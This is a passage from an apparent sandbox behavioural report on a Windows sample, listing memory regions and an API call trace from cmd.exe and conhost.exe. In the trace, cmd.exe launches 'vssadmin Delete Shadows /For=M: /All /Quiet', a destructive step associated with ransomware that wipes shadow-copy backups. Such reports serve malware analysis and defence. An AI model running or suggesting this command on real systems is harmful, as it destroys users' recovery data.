	            name = "private_0x0000000004740000"
	        filename = ""

Region:
	              id = 4044
	        start_va = 0x49a0000
	          end_va = 0x4b4ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000049a0000"
	        filename = ""

Region:
	              id = 4057
	        start_va = 0x4350000
	          end_va = 0x4353fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 4118
	        start_va = 0x4360000
	          end_va = 0x4363fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004360000"
	        filename = ""

Region:
	              id = 4159
	        start_va = 0x4b50000
	          end_va = 0x4e86fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")


Thread:
	id = 294
	os_tid = 0x13a8

	[0280.175] GetProcAddress (hModule=0x76d90000, lpProcName="SetConsoleInputExeNameW") returned 0x746ab440
	[0280.176] GetProcessHeap () returned 0x48a0000
	[0280.176] RtlAllocateHeap (HeapHandle=0x48a0000, Flags=0x8, Size=0x400a) returned 0x48ab998
	[0280.176] GetProcessHeap () returned 0x48a0000
	[0280.177] RtlFreeHeap (HeapHandle=0x48a0000, Flags=0x0, BaseAddress=0x48ab998) returned 1
	[0280.179] _wcsicmp (_String1="vssadmin", _String2=")") returned 77
	[0280.179] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16
	[0280.179] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16
	[0280.179] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13
	[0280.179] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13
	[0280.180] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4
	[0280.180] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4
	[0280.180] GetProcessHeap () returned 0x48a0000
	[0280.180] RtlAllocateHeap (HeapHandle=0x48a0000, Flags=0x8, Size=0x58) returned 0x48a74f8
	[0280.180] GetProcessHeap () returned 0x48a0000
	[0280.180] RtlAllocateHeap (HeapHandle=0x48a0000, Flags=0x8, Size=0x1a) returned 0x48a9048
	[0280.183] GetProcessHeap () returned 0x48a0000
	[0280.183] RtlAllocateHeap (HeapHandle=0x48a0000, Flags=0x8, Size=0x52) returned 0x48a9070
	[0280.189] GetConsoleTitleW (in: lpConsoleTitle=0x18f500, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0280.530] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0280.530] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0280.530] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0280.530] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0280.530] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0280.530] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0280.531] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0280.531] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0280.531] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0280.531] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0280.531] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0280.531] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0280.531] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0280.531] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0280.531] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0280.531] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0280.531] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0280.531] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0280.531] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0280.532] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0280.532] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0280.532] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0280.532] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0280.532] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0280.532] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0280.532] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0280.532] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0280.532] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0280.532] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0280.532] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0280.532] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0280.533] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0280.533] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0280.533] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0280.533] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0280.533] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0280.533] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0280.533] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0280.533] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0280.533] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0280.533] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0280.533] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0280.533] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0280.533] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0280.533] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0280.533] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0280.534] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0280.534] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0280.534] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0280.534] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0280.534] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0280.534] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0280.534] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0280.534] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0280.534] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0280.534] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0280.534] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0280.534] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0280.534] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0280.534] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0280.535] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0280.535] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0280.535] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0280.535] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0280.535] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0280.535] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0280.535] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0280.535] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0280.535] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0280.535] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0280.535] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0280.535] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0280.535] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0280.536] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0280.536] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0280.536] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0280.536] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0280.536] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0280.536] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0280.536] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0280.536] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0280.536] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0280.536] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0280.536] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0280.536] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16
	[0280.536] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13
	[0280.536] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4
	[0280.538] GetProcessHeap () returned 0x48a0000
	[0280.538] RtlAllocateHeap (HeapHandle=0x48a0000, Flags=0x8, Size=0x210) returned 0x48a90d0
	[0280.538] GetProcessHeap () returned 0x48a0000
	[0280.538] RtlAllocateHeap (HeapHandle=0x48a0000, Flags=0x8, Size=0x64) returned 0x48a92e8
	[0280.538] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19
	[0280.539] GetProcessHeap () returned 0x48a0000
	[0280.539] RtlAllocateHeap (HeapHandle=0x48a0000, Flags=0x8, Size=0x418) returned 0x48a05c8
	[0280.540] SetErrorMode (uMode=0x0) returned 0x0
	[0280.540] SetErrorMode (uMode=0x1) returned 0x0
	[0280.540] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x48a05d0, lpFilePart=0x18f00c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x18f00c*="Desktop") returned 0x1d
	[0280.540] SetErrorMode (uMode=0x0) returned 0x1
	[0280.540] GetProcessHeap () returned 0x48a0000
	[0280.540] RtlReAllocateHeap (Heap=0x48a0000, Flags=0x0, Ptr=0x48a05c8, Size=0x56) returned 0x48a05c8
	[0280.540] GetProcessHeap () returned 0x48a0000
	[0280.540] RtlSizeHeap (HeapHandle=0x48a0000, Flags=0x0, MemoryPointer=0x48a05c8) returned 0x56
	[0280.541] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x9c
	[0280.541] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0280.541] GetProcessHeap () returned 0x48a0000
	[0280.541] RtlAllocateHeap (HeapHandle=0x48a0000, Flags=0x8, Size=0x182) returned 0x48a9358
	[0280.542] GetProcessHeap () returned 0x48a0000
	[0280.542] RtlAllocateHeap (HeapHandle=0x48a0000, Flags=0x8, Size=0x2fc) returned 0x48a0628
	[0280.569] GetProcessHeap () returned 0x48a0000
	[0280.569] RtlReAllocateHeap (Heap=0x48a0000, Flags=0x0, Ptr=0x48a0628, Size=0x184) returned 0x48a0628
	[0280.569] GetProcessHeap () returned 0x48a0000
	[0280.570] RtlSizeHeap (HeapHandle=0x48a0000, Flags=0x0, MemoryPointer=0x48a0628) returned 0x184
	[0280.570] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35
	[0280.570] GetProcessHeap () returned 0x48a0000
	[0280.570] RtlAllocateHeap (HeapHandle=0x48a0000, Flags=0x8, Size=0xe0) returned 0x48a94e8
	[0280.747] GetProcessHeap () returned 0x48a0000
	[0280.747] RtlReAllocateHeap (Heap=0x48a0000, Flags=0x0, Ptr=0x48a94e8, Size=0x76) returned 0x48a94e8
	[0280.747] GetProcessHeap () returned 0x48a0000
	[0280.747] RtlSizeHeap (HeapHandle=0x48a0000, Flags=0x0, MemoryPointer=0x48a94e8) returned 0x76
	[0280.748] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0280.749] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\vssadmin.*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18ed98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ed98) returned 0xffffffff
	[0280.750] GetLastError () returned 0x2
	[0280.750] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0280.750] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\vssadmin.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18ed98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ed98) returned 0xffffffff
	[0280.752] GetLastError () returned 0x2
	[0280.752] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0280.752] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*" (normalized: "c:\\windows\\syswow64\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18ed98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ed98) returned 0x48a9568
	[0280.752] GetProcessHeap () returned 0x48a0000
	[0280.752] RtlAllocateHeap (HeapHandle=0x48a0000, Flags=0x0, Size=0x14) returned 0x48a7b10
	[0280.753] FindClose (in: hFindFile=0x48a9568 | out: hFindFile=0x48a9568) returned 1
	[0280.753] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM" (normalized: "c:\\windows\\syswow64\\vssadmin.com"), fInfoLevelId=0x1, lpFindFileData=0x18ed98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ed98) returned 0xffffffff
	[0280.753] GetLastError () returned 0x2
	[0280.753] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE" (normalized: "c:\\windows\\syswow64\\vssadmin.exe"), fInfoLevelId=0x1, lpFindFileData=0x18ed98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ed98) returned 0x48a9568
	[0280.753] GetProcessHeap () returned 0x48a0000
	[0280.754] RtlReAllocateHeap (Heap=0x48a0000, Flags=0x0, Ptr=0x48a7b10, Size=0x4) returned 0x48a7358
	[0280.754] FindClose (in: hFindFile=0x48a9568 | out: hFindFile=0x48a9568) returned 1
	[0280.754] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0280.754] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0280.754] GetConsoleTitleW (in: lpConsoleTitle=0x18f28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0281.056] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f1b8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f19c | out: lpAttributeList=0x18f1b8, lpSize=0x18f19c) returned 1
	[0281.056] UpdateProcThreadAttribute (in: lpAttributeList=0x18f1b8, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f1a4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f1b8, lpPreviousValue=0x0) returned 1
	[0281.057] GetStartupInfoW (in: lpStartupInfo=0x18f1f0 | out: lpStartupInfo=0x18f1f0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) 
	[0281.057] GetProcessHeap () returned 0x48a0000
	[0281.057] RtlAllocateHeap (HeapHandle=0x48a0000, Flags=0x8, Size=0x18) returned 0x48a7a70
	[0281.057] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0281.057] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0281.057] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0281.057] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0281.057] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0281.057] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0281.057] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0281.058] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0281.058] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0281.058] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0281.058] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0281.059] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0281.059] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0281.059] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0281.059] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0281.059] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0281.059] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0281.059] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0281.059] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0281.060] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0281.060] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0281.060] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0281.060] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0281.060] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0281.060] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0281.060] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0281.060] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0281.060] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0281.060] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0281.060] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0281.061] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0281.061] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0281.061] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0281.061] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0281.061] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0281.061] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0281.061] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0281.061] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0281.061] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0281.061] GetProcessHeap () returned 0x48a0000
	[0281.061] RtlFreeHeap (HeapHandle=0x48a0000, Flags=0x0, BaseAddress=0x48a7a70) returned 1
	[0281.062] GetProcessHeap () returned 0x48a0000
	[0281.062] RtlAllocateHeap (HeapHandle=0x48a0000, Flags=0x8, Size=0xa) returned 0x48a9568
	[0281.062] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1
	[0281.066] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin  Delete Shadows /For=M: /All /Quiet ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x18f140*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin  Delete Shadows /For=M: /All /Quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f18c | out: lpCommandLine="vssadmin  Delete Shadows /For=M: /All /Quiet ", lpProcessInformation=0x18f18c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x9f0, dwThreadId=0xc8c)) returned 1
	[0281.089] CloseHandle (hObject=0xa4) returned 1
	[0281.090] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0281.090] GetProcessHeap () returned 0x48a0000
	[0281.090] RtlFreeHeap (HeapHandle=0x48a0000, Flags=0x0, BaseAddress=0x48aadf0) returned 1
	[0281.090] GetEnvironmentStringsW () returned 0x48aa248*
	[0281.090] GetProcessHeap () returned 0x48a0000
	[0281.091] RtlAllocateHeap (HeapHandle=0x48a0000, Flags=0x8, Size=0xb9c) returned 0x48aadf0
	[0281.091] memcpy (in: _Dst=0x48aadf0, _Src=0x48aa248, _Size=0xb9c | out: _Dst=0x48aadf0) returned 0x48aadf0
	[0281.091] FreeEnvironmentStringsA (penv="=") returned 1
	[0281.091] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0
	[0303.897] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x18f124 | out: lpExitCode=0x18f124*=0x2) returned 1
	[0303.900] CloseHandle (hObject=0xa8) returned 1
	[0303.901] _vsnwprintf (in: _Buffer=0x18f20c, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f12c | out: _Buffer="00000002") returned 8
	[0303.902] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1
	[0303.903] GetProcessHeap () returned 0x48a0000
	[0303.904] RtlFreeHeap (HeapHandle=0x48a0000, Flags=0x0, BaseAddress=0x48aadf0) returned 1
	[0303.904] GetEnvironmentStringsW () returned 0x48aa248*
	[0303.904] GetProcessHeap () returned 0x48a0000
	[0303.904] RtlAllocateHeap (HeapHandle=0x48a0000, Flags=0x8, Size=0xbc2) returned 0x48ac568
	[0303.904] memcpy (in: _Dst=0x48ac568, _Src=0x48aa248, _Size=0xbc2 | out: _Dst=0x48ac568) returned 0x48ac568
	[0303.904] FreeEnvironmentStringsA (penv="=") returned 1
	[0303.904] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0303.904] GetProcessHeap () returned 0x48a0000
	[0303.905] RtlFreeHeap (HeapHandle=0x48a0000, Flags=0x0, BaseAddress=0x48ac568) returned 1
	[0303.905] GetEnvironmentStringsW () returned 0x48aa248*
	[0303.905] GetProcessHeap () returned 0x48a0000
	[0303.905] RtlAllocateHeap (HeapHandle=0x48a0000, Flags=0x8, Size=0xbc2) returned 0x48ac568
	[0303.905] memcpy (in: _Dst=0x48ac568, _Src=0x48aa248, _Size=0xbc2 | out: _Dst=0x48ac568) returned 0x48ac568
	[0303.905] FreeEnvironmentStringsA (penv="=") returned 1
	[0303.905] GetProcessHeap () returned 0x48a0000
	[0303.905] RtlFreeHeap (HeapHandle=0x48a0000, Flags=0x0, BaseAddress=0x48a9568) returned 1
	[0303.905] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f1b8 | out: lpAttributeList=0x18f1b8) 
	[0303.906] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0303.906] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1
	[0303.996] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0303.996] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x31f40c | out: lpMode=0x31f40c) returned 1
	[0304.118] _get_osfhandle (_FileHandle=0) returned 0x38
	[0304.119] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x31f408 | out: lpMode=0x31f408) returned 1
	[0304.318] SetConsoleInputExeNameW () returned 0x1
	[0304.318] GetConsoleOutputCP () returned 0x1b5
	[0304.456] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x31f460 | out: lpCPInfo=0x31f460) returned 1
	[0304.456] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0304.563] exit (_Code=2) 

Thread:
	id = 316
	os_tid = 0x130c


Process:
	id = "51"
	image_name = "conhost.exe"
	filename = "c:\\windows\\system32\\conhost.exe"
	page_root = "0x2f487000"
	os_pid = "0x13ec"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "50"
	os_parent_pid = "0xa2c"
	cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
	cur_dir = "C:\\Windows"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 3796
	        start_va = 0x37800000
	          end_va = 0x379fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000037800000"
	        filename = ""

Region:
	              id = 3797
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 3798
	        start_va = 0x38b7720000
	          end_va = 0x38b775ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000038b7720000"
	        filename = ""

Region:
	              id = 3799
	        start_va = 0x38b7800000
	          end_va = 0x38b79fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000038b7800000"
	        filename = ""

Region:
	              id = 3800
	        start_va = 0x196c5d30000
	          end_va = 0x196c5d4ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000196c5d30000"
	        filename = ""

Region:
	              id = 3801
	        start_va = 0x196c5d50000
	          end_va = 0x196c5d64fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000196c5d50000"
	        filename = ""

Region:
	              id = 3802
	        start_va = 0x7df5ffbb0000
	          end_va = 0x7ff5ffbaffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ffbb0000"
	        filename = ""

Region:
	              id = 3803
	        start_va = 0x7ff7fee30000
	          end_va = 0x7ff7fee52fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7fee30000"
	        filename = ""

Region:
	              id = 3804
	        start_va = 0x7ff7ffcf0000
	          end_va = 0x7ff7ffd00fff
	       monitored = 0
	     entry_point = 0x7ff7ffcf16b0
	     region_type = mapped_file
	            name = "conhost.exe"
	        filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")

Region:
	              id = 3805
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 3806
	        start_va = 0x196c5d70000
	          end_va = 0x196c603ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000196c5d70000"
	        filename = ""

Region:
	              id = 3807
	        start_va = 0x7ff958860000
	          end_va = 0x7ff95890cfff
	       monitored = 0
	     entry_point = 0x7ff9588781a0
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
